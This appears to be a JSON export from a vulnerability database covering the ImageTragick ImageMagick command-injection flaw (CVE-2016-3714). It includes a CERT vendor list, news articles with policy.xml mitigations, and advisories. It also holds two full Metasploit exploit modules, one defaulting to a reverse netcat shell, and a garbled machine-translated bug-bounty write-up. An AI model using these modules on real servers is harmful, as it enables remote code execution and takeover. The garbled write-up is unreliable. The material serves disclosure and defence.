Click here to view vendors.**\n\n### Arch Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CentOS Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ImageMagick Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. 
Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### openSUSE project Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 12 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 7.3 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://imagetragick.com/>\n * 
[https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588](<https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588>)\n * <http://www.openwall.com/lists/oss-security/2016/05/03/18>\n\n### Acknowledgements\n\nThe ImageTragick website credits Stewie and Nikolay Ermishkin of the Mail.Ru Security Team for discovering these vulnerabilities.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-3714](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-3714>) \n---|--- \n**Date Public:** | 2016-05-03 \n**Date First Published:** | 2016-05-04 \n**Date Last Updated: ** | 2016-05-04 21:14 UTC \n**Document Revision: ** | 21 \n", "modified": "2016-05-04T21:14:00", "published": "2016-05-04T00:00:00", "id": "VU:250519", "href": "https://www.kb.cert.org/vuls/id/250519", "type": "cert", "title": "ImageMagick does not properly validate input before processing images using a delegate", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "Within hours of the disclosure of serious vulnerabilities in ImageMagick, public exploits were available increasing the risk to thousands of websites that make use of the open source image-processing software.\n\nAttackers can append malicious code to an image file that ImageMagick will process without question, leading to, in the case of one of the vulnerabilities, remote code execution. The scope of the issue is severe since image-processing plugins such as PHP imagick, Ruby rmagick and Ruby paperclip, and nodeJS imagemagick among others are built on top of the ImageMagick library.\n\nResearcher Ryan Huber was among the first on Tuesday to publicly disclose that ImageMagick had a problem. 
A researcher from the Mail.ru team in Russia who goes by the handle Stewie found the flaw, while Nikolay Ermishkin, also of the Mail.ru team, found the remote code execution issue.\n\n\u201cWe have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them,\u201d Huber wrote on the [ImageTragick website](<https://imagetragick.com/>), a landing page complete with FAQ on the bugs. \u201cAn unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software.\u201d\n\nResearcher Dan Tentler yesterday afternoon tweeted that he had come up with a working proof-of-concept exploit, and today [an exploit developed by Ermishkin](<http://www.openwall.com/lists/oss-security/2016/05/03/18>) was posted to the OSS-Security mailing list.\n\n> Done. \nWeaponized exploit. [pic.twitter.com/PtrY6wf7DT](<https://t.co/PtrY6wf7DT>)\n> \n> \u2014 Dan Tentler (@Viss) [May 3, 2016](<https://twitter.com/Viss/status/727625561179201536>)\n\nHuber and Ermishkin warned in their respective posts that websites that process user-submitted images are particularly at risk to public exploits.\n\nErmishkin privately disclosed the bugs to ImageMagick\u2019s developers who pushed out a fix on April 30; Ermishkin, however, said the fix was incomplete and work continues on a new patch.\n\nImageMagick, meanwhile, yesterday posted a mitigation to its forums. 
They suggest adding the following code to the ImageMagick policy.xml file.\n\n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\n\n\u201cWe have secured these coders in ImageMagick 7.0.1-1 and 6.9.3-10 (available by this weekend) by sanitizing the HTTPS parameters and preventing indirect reads with this policy: <policy domain=\"path\" rights=\"none\" pattern=\"@*\" />\u201d ImageMagick said. \u201cIf you require the HTTPS, MVG, or MSL coders, the above policy is sufficient to prevent exploits.\u201d\n\nHuber also suggested a pair of mitigations: that users verify that image files begin with the proper \u201cmagic bytes\u201d that correspond to image file types before ImageMagick processes them; and the use of policy files to disable vulnerable ImageMagick coders.\n\nThe vulnerabilities, covered in CVE-2016-3714, are described as insufficient shell character filtering.\n\nFrom the advisory:\n\n> \u201cImageMagick allows to process files with external libraries. This feature is called \u2018delegate\u2019. It is implemented as a system() with command string (\u2018command\u2019) from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection.\n> \n> The most dangerous part is ImageMagick supports several formats like svg, mvg, maybe some others\u2014which allow to include external files from any supported protocol including delegates. 
As a result, any service, which uses ImageMagick to process user supplied images and uses default delegates.xml / policy.xml, may be vulnerable to this issue.\u201d\n", "modified": "2016-05-10T12:37:34", "published": "2016-05-04T12:17:05", "id": "THREATPOST:0FADDF3632693BA6B864F1A3FB8D7EF9", "href": "https://threatpost.com/public-exploits-available-for-imagemagick-vulnerabilities/117835/", "type": "threatpost", "title": "Public Exploits Available for ImageMagick Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-02T22:33:20", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "UPDATE\n\nSearch engine optimization and analytics firm SEMrush patched a remote code execution vulnerability that allowed an attacker to send a malicious image to its service and generate a reverse shell, a typical first stage in a cyberattack. [Public disclosure of the vulnerability](<https://hackerone.com/reports/403417>) was Monday when details of the bug were shared by a white hat hacker who boasted he had earned a bounty of $10,000 for the discovery.\n\nThe RCE bug was tied to SEMrush\u2019s Report Builder feature that allows users to generate custom web analytics reports using their own branding. The problem was how SEMrush handled logo images uploaded to the platform and the use of an unpatched version of ImageMagick, a web service used to process images.\n\nSEMrush said the impact was limited to an isolated portion of its main platform. \u201cThis bug affected a specific microservice responsible for generating reports,\u201d a company spokesperson said. 
\u201cThe attacker, even in the event of a successful attack on the server, under no circumstances can access the entire platform.\u201d\n\nAccording to Frans Ros\u00e9n who is credited with finding the bug via the HackerOne bug bounty platform:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/25182745/SEMrush-Screen_Shot.png>)\u201cThe Logo upload in the report constructor is passed through a not properly patched version of ImageMagick. You can use Postscript to get Ghostscript to run which in return allows to trigger arbitrary commands on the server, leading to Remote Code Execution.\u201d\n\nSEMrush said the window of vulnerability was only a few days. \u201cWe would also like to mention that our platform is WAF (Web Application Firewall) secured which proactively protects our platform from attacks but a few days before report we turned it to monitoring mode to mitigate some false positive alert, that was why Frans Ros\u00e9n got the opportunity to successfully exploit the issue,\u201d the company said.\n\nWhile public disclosure of the bug was Monday, SEMrush said the bug was originally reported in August of 2018 and fixed within an hour of it being reported. It said there is no evidence the vulnerability was ever exploited by a malicious actor.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/25182910/image-tragick-logo-medium.png>)The researcher tied the ImageMagick vulnerability to a second Ghostscript flaw that could allow attackers to take remote control of systems. Ghostscript is a widely used interpreter for Adobe PostScript and PDF page description languages. 
[Last year](<https://threatpost.com/unpatched-ghostscript-flaws-allow-remote-takeover-of-systems/136800/>), Tavis Ormandy, a vulnerability researcher at Google\u2019s Project Zero security team, discovered a Ghostscript bug and that it could allow attackers to remotely take control of a vulnerable system.\n\n\u201cGhostscript contains an optional -dSAFER option, which is supposed to prevent unsafe PostScript operations. Multiple PostScript operations bypass the protections provided by -dSAFER, which can allow an attacker to execute arbitrary commands with arbitrary arguments,\u201d wrote the [U.S. Computer Emergency Readiness Team](<https://www.kb.cert.org/vuls/id/332928/>). \u201cThis vulnerability can also be exploited in applications that leverage Ghostscript, such as ImageMagick, GraphicsMagick, evince, Okular, Nautilus, and others.\u201d\n\nFixes for Ghostscript were deployed in August 2018.\n\nResearcher [Ros\u00e9n](<https://twitter.com/fransrosen>) did not return a request for comment.\n\nMitigation advice from the researcher at the time to SEMrush was to \u201curgently make sure your policy.xml for imagemagick ONLY allows gif, jpg, png and nothing else.\u201d\n\n_(This story was updated on 8 a.m. 
EDT 2/24 with a comment from SEMrush)_\n", "modified": "2019-06-25T22:47:50", "published": "2019-06-25T22:47:50", "id": "THREATPOST:5A0AA7B5B7C5F0F1DCB3F0240A055C3F", "href": "https://threatpost.com/semrush-plugs-remote-code-execution-bug-in-its-saas-platform/146003/", "type": "threatpost", "title": "SEMrush Plugs Remote Code Execution Bug in Its SaaS Platform", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:58", "description": "", "published": "2016-05-06T00:00:00", "type": "packetstorm", "title": "ImageMagick Delegate Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714"], "modified": "2016-05-06T00:00:00", "id": "PACKETSTORM:136931", "href": "https://packetstormsecurity.com/files/136931/ImageMagick-Delegate-Arbitrary-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ImageMagick Delegate Arbitrary Command Execution', \n'Description' => %q{ \nThis module exploits a shell command injection in the way \"delegates\" \n(commands for converting files) are processed in ImageMagick versions \n<= 7.0.1-0 and <= 6.9.3-9 (legacy). \n \nSince ImageMagick uses file magic to detect file format, you can create \na .png (for example) which is actually a crafted SVG (for example) that \ntriggers the command injection. \n \nTested on Linux, BSD, and OS X. You'll want to choose your payload \ncarefully due to portability concerns. Use cmd/unix/generic if need be. 
\n}, \n'Author' => [ \n'stewie', # Vulnerability discovery \n'Nikolay Ermishkin', # Vulnerability discovery \n'wvu', # Metasploit module \n'hdm' # Metasploit module \n], \n'References' => [ \n%w{CVE 2016-3714}, \n%w{URL https://imagetragick.com/}, \n%w{URL http://seclists.org/oss-sec/2016/q2/205}, \n%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab}, \n%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456} \n], \n'DisclosureDate' => 'May 3 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => false, \n'Payload' => { \n'BadChars' => \"\\x22\\x27\\x5c\", # \", ', and \\ \n'Compat' => { \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic netcat bash-tcp' \n} \n}, \n'Targets' => [ \n['SVG file', template: 'msf.svg'], # convert msf.png msf.svg \n['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg \n['MIFF file', template: 'msf.miff'] # convert -label \"\" msf.svg msf.miff \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat', \n'LHOST' => Rex::Socket.source_address, \n'DisablePayloadHandler' => false, \n'WfsDelay' => 9001 \n} \n)) \n \nregister_options([ \nOptString.new('FILENAME', [true, 'Output file', 'msf.png']) \n]) \nend \n \ndef exploit \nif target.name == 'SVG file' \np = Rex::Text.html_encode(payload.encoded) \nelse \np = payload.encoded \nend \n \nfile_create(template.sub('echo vulnerable', p)) \nend \n \ndef template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template] \n)) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136931/imagemagick_delegate.rb.txt"}], "archlinux": [{"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714"], "description": "It was discovered that ImageMagick did not properly sanitize certain\ninput 
before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed by\nan application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.", "modified": "2016-05-05T00:00:00", "published": "2016-05-05T00:00:00", "id": "ASA-201605-6", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000613.html", "type": "archlinux", "title": "imagemagick: arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:18", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "[](<https://1.bp.blogspot.com/--eWNPZGZC2A/VynHhjkFL3I/AAAAAAAAn88/s9rSTN6ePHkOTToGzkErHlg36uu3gPOsACLcB/s1600/ImageMagick-exploit-hack.png>)\n\nA serious zero-day vulnerability has been discovered in **ImageMagick**, a widely popular software tool used by a large number of websites to process user's photos, which could allow hackers to execute malicious code remotely on servers. \n \nImageMagick is an open-source image processing library that lets users resize, scale, crop, watermark and tweak images. \n \nThe ImageMagick tool is supported by many programming languages, including Perl, C++, PHP, Python, Ruby and is being deployed by millions of websites, blogs, social media platforms, and popular content management systems (CMS) such as WordPress and Drupal. \n \nSlack security engineer Ryan Huber disclosed a **zero-day flaw (CVE-2016-3714)** in the ImageMagick image processing library that allows a hacker to execute malicious code on a Web server by uploading a maliciously crafted image. 
\n \nFor example, by uploading a booby-trapped selfie to a web service that uses ImageMagick, an attacker can execute malicious code on the website's server and steal critical information, snoop on user's accounts and much more. \n \nIn other words, only those websites are vulnerable that make use of ImageMagick and allow their users to upload images. \n \nThe exploit for the vulnerability has been released and named: [ImageTragick](<https://github.com/ImageTragick/PoCs>). \n\n\n> \"The exploit for this vulnerability is being used in the wild,\" Huber wrote in a blog post [published](<https://medium.com/@rhuber/imagemagick-is-on-fire-cve-2016-3714-379faf762247#.a4sx18wso>) Tuesday. \"The exploit is trivial, so we expect it to be available within hours of this post.\"\n\n> He added \"We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software.\"\n\nThe ImageMagick team has also acknowledged the flaw, [saying](<https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588>) the recent_ \"vulnerability reports \u2026 include possible Remote Code Execution and ability to render files on the local system.\" _ \n \nThough the team has not rolled out any security patches, it recommended that website administrators should add several lines of code to configuration files in order to block attacks, at least via the possible exploits. \n \nWeb administrators are also recommended to check the '**magic bytes**' in files sent to ImageMagick before allowing the image files to be processed on their end. \n \nMagic bytes are the first few bytes of a file used to identify the image type, such as GIF, JPEG, PNG. 
\n \nThe vulnerability will be patched in versions 7.0.1-1 and 6.9.3-10 of ImageMagick, which are due to be released by the weekend.\n", "modified": "2016-05-04T10:01:59", "published": "2016-05-03T22:59:00", "id": "THN:76D72EEDBF0F154F1633FE307178F974", "href": "https://thehackernews.com/2016/05/imagemagick-exploit-hack.html", "type": "thn", "title": "Warning \u2014 Widely Popular ImageMagick Tool Vulnerable to Remote Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-06-06T11:17:31", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "edition": 1, "description": "One, Foreword \nTime to get back to 5 May 20, the night before that, I spent several days time to study the Yahoo Messenger app, still can't figure out how it works, but annoying headache and neck pain and looking for me. So I decided to go for a walk, find a new target. Then I noticed a very interesting thing, and that is named Sean one of the researchers participating in the Yahoo Bug reward program, because the test behavior beyond Yahoo's permit boundaries and is blacklisted. \nBack inside later, I and friends Thomas\uff08dawgyg do a lot of exchanges, we agreed that you can then look at Sean being blacklisted before the test of that application. \nSecond, step 1: reconnaissance step on the point \nSean's goal is to be the Yahoo acquisition of some subsidiaries, in which he wrote that paper, these companies the use of domain name comprising: \n*. mediagroupone.de \n*. snacktv.de \n*. vertical-network.de \n*. vertical-n.de \n*. fabalista.com \nAlthough the above there are quite a few domain names, but in Sean's report, is aimed primarily at SnackTV content management system. 
Me and Thomas decided to repeat the Sean method used, and to SnackTV the www site as the goal, the reason for doing this is that Thomas has in this site took some time, but also to find some[XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)comfortably vulnerability. This site with other sites are different, the reason there are two points: \uff081\uff09This is a German company, \uff082\uff09This is for video producers ready to the developer's website, not as an ordinary Yahoo user. \n! [](/Article/UploadPic/2017-6/20176618118591. png? www. myhack58. com) \nThe figure above is SnackTV the search page. Obviously this is a video site, but the user must be registered through the Administrator Manual review, so we cannot directly visit the website of the upload panel. \nDue to Thomas being busy with automated scanning this website, I took some time to develop with this application feel that certain things abnormal reaction of the base is usually to be able to understand their normal reaction is. \nThree, step two: scan \nIn the mining the application of the vulnerability, me and Thomas are doing is running with this particular application related to the background tasks. I used the\u201csubbrute\u201dand\u201cdirsearch\u201dboth passive identification script, object\uff081\uff09Tap directly vulnerability and\uff082\uff09to detect the possible presence of vulnerabilities. Understand how to use these tools can help penetration testers to tap vulnerability. \nIt took a long time to run these tools, we harvest a lot of output, but our help is not large. These output information in the most is the standard error message, such as access to\u201c. htpasswd\u201doccurs when an HTTP 403 error, the\u201cadmin\u201dpage can not be accessed directly be redirected to the login page. However, the use of\u201cdirsearch\u201dscript after a lot of a list of keywords after the match, and ultimately we did harvest a vulnerable point. 
\nThere is a problem of a file named\u201cgetImg.php\u201dthe file is located in\u201cimged\u201ddirectory http://snacktv.de/imged/getImg.php in. After some search, we found through Google search\u201csite:snacktv.de filetype:php\u201dcan the public access this file. This step is very important, because the presence of the vulnerability of this file need a GET parameter to return content. We may need to spend weeks of time to brute force or guess the correct GET parameters, I guess no one is willing to do so, because these parameters usually requires with the addition of a parameter fit to perform the correct query request. \nGET parameters of a typical logic process flow is as follows: \n1, access\u201chttp://example.com/supersecretdevblog.php\u201d: return HTTP 500 Internal Server error, indicating that we must provide a parameter to see the content. \n2, the access\u201chttp://example.com/supersecretdevblog.php?page=index&post=1\u201d: returns HTTP 200 response, indicating that the parameters are correct, it is possible to return sensitive information. \nSo far, we know information including: \n1, The\u201cgetImage.php\u201dfiles require multiple HTTP GET parameters, if we by\u201cimgurl\u201dparameter to provide an image of the link address, then this file will be based on this address automatically download a modified picture. \n2, According to Google search exposure parameters, we know the file with ImageMagick crop function related. \nFourth, step 3: vulnerability access and logic escape limited \nWhen digging out these information, we think the first point is the\u201cImageTragick\u201dVulnerability, CVE-2016-3714, we decided to send a few test loads to try. \nMe and Thomas spent a couple of hours of time, the structure contains a vulnerability load the image file. 
Exploit the principle is the use of the hotspot image file that contains the load image files, the server use the \u201cImageMagick\u201dcommand-line tool to process this image file, because this tool filter is not strict, resulting in the process in the presence of arbitrary command execution vulnerability. However our load is not a success, which makes us a bit discouraged\u3002 We doubt whether they have for this load file the patch. \nWe sent to the server, load the sample as shown below. Picture address using our private domain name, it will load uploaded to the server, we pass the\u201cimageurl\u201dparameter to get the server load on the pictures. Our goal is to make the server execute an arbitrary command. Please note that where\u201cxlink:href\u201dis pointing to the picture address. \nIn addition to the server in the processed file belongs URL address on a bit of a strange outside, everything is normal. We send to the server some random text file, the server returns the data always associated with the previous call of the same. We carefully read the\u201cImageMagick\u201drelevant information, combined with the vulnerability to disclose the details, we find that the server does not seem to exist for this vulnerability, it is possible the server does not use ImageMagick to. We defer the attack this file, decided to look at the site whether there is other vulnerabilities. \nAt approximately 3:30 AM, we found several stored cross site scripting vulnerability, HTTP 401 response to injection vulnerabilities as well as common mismanagement issues, but these are not critical issues. When you participate in bug reward program, especially for a sub-company for test, these issues of bonus typically will be substantially diminished, because the impact of these problems is very low. In some people's eyes, get discount bonus can still accept, but for others it's just a waste of time. 
The particular advantage of targeting an acquired subsidiary is that many people relax their security vigilance on such targets. \nBack to the URL: I was getting a little irritable and began to wonder how exactly the server was processing the picture files. What if Yahoo was not handling the picture as a whole, but instead injecting the URL into the \u201cimage xlink:href\u201d in the XML, in a way similar to the vulnerability PoC? What kind of payload would I then need to try in order to verify my guess? \nI appended an extra double quote to the address in the browser, and then saw some interesting output, as follows: \n\n\n**[1] [[2]](<86777_2.htm>) [next](<86777_2.htm>)**\n", "modified": "2017-06-06T00:00:00", "published": "2017-06-06T00:00:00", "id": "MYHACK58:62201786777", "href": "http://www.myhack58.com/Article/html/3/62/2017/86777.htm", "title": "How to pass the command injection vulnerability fix Yahoo subsidiary production servers-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-03T20:00:47", "description": "This module exploits a shell command injection in the way \"delegates\" (commands for converting files) are processed in ImageMagick versions <= 7.0.1-0 and <= 6.9.3-9 (legacy). Since ImageMagick uses file magic to detect file format, you can create a .png (for example) which is actually a crafted SVG (for example) that triggers the command injection. The PostScript (PS) target leverages a Ghostscript -dSAFER bypass (discovered by taviso) to achieve RCE in the Ghostscript delegate. Ghostscript versions 9.18 and later are affected. This target is provided as is and will not be updated to track additional vulns. If USE_POPEN is set to true, a |-prefixed command will be used for the exploit. 
No delegates are involved in this exploitation.\n", "published": "2016-05-05T19:18:42", "type": "metasploit", "title": "ImageMagick Delegate Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714", "CVE-2016-7976"], "modified": "2019-04-24T16:34:42", "id": "MSF:EXPLOIT/UNIX/FILEFORMAT/IMAGEMAGICK_DELEGATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ImageMagick Delegate Arbitrary Command Execution',\n 'Description' => %q{\n This module exploits a shell command injection in the way \"delegates\"\n (commands for converting files) are processed in ImageMagick versions\n <= 7.0.1-0 and <= 6.9.3-9 (legacy).\n\n Since ImageMagick uses file magic to detect file format, you can create\n a .png (for example) which is actually a crafted SVG (for example) that\n triggers the command injection.\n\n The PostScript (PS) target leverages a Ghostscript -dSAFER bypass\n (discovered by taviso) to achieve RCE in the Ghostscript delegate.\n Ghostscript versions 9.18 and later are affected. This target is\n provided as is and will not be updated to track additional vulns.\n\n If USE_POPEN is set to true, a |-prefixed command will be used for the\n exploit. 
No delegates are involved in this exploitation.\n },\n 'Author' => [\n 'stewie', # Vulnerability discovery\n 'Nikolay Ermishkin', # Vulnerability discovery\n 'Tavis Ormandy', # Vulnerability discovery\n 'wvu', # Metasploit module\n 'hdm' # Metasploit module\n ],\n 'References' => [\n %w{CVE 2016-3714},\n %w{CVE 2016-7976},\n %w{URL https://imagetragick.com/},\n %w{URL https://seclists.org/oss-sec/2016/q2/205},\n %w{URL https://seclists.org/oss-sec/2016/q3/682},\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},\n %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}\n ],\n 'DisclosureDate' => '2016-05-03',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'BadChars' => \"\\x22\\x27\\x5c\" # \", ', and \\\n },\n 'Targets' => [\n ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg\n ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg\n ['PS file', template: 'msf.ps'] # PoC from taviso\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['ImageTragick'],\n 'RelatedModules' => [\n 'exploit/unix/fileformat/ghostscript_type_confusion',\n 'exploit/multi/fileformat/ghostscript_failed_restore'\n ]\n }\n ))\n\n register_options([\n OptString.new('FILENAME', [true, 'Output file', 'msf.png']),\n OptBool.new('USE_POPEN', [false, 'Use popen() vector', true])\n ])\n end\n\n def exploit\n if target.name == 'SVG file'\n p = Rex::Text.html_encode(payload.encoded)\n else\n p = payload.encoded\n end\n\n file_create(template.sub('echo vulnerable > /dev/tty', p))\n end\n\n def template\n if datastore['USE_POPEN']\n t = 'popen'\n else\n t = 'delegate'\n end\n\n begin\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'imagemagick', t,\n target[:template]\n ))\n rescue Errno::ENOENT\n fail_with(Failure::NoTarget, \"Target has no #{t} support\")\n end\n end\nend\n", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/fileformat/imagemagick_delegate.rb"}], "hackerone": [{"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 7500.0, "cvelist": [], "description": "The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka \"ImageTragick.\" \n\nSee also: \nhttp://www.openwall.com/lists/oss-security/2016/05/03/18 \nhttps://imagetragick.com/\n", "modified": "2016-05-03T00:00:00", "published": "2016-04-21T00:00:00", "id": "H1:143966", "href": "https://hackerone.com/reports/143966", "type": "hackerone", "title": "The Internet: Insufficient shell characters filtering leads to (potentially remote) code execution (CVE-2016-3714)", "cvss": {"score": 0.0, "vector": "NONE"}}]}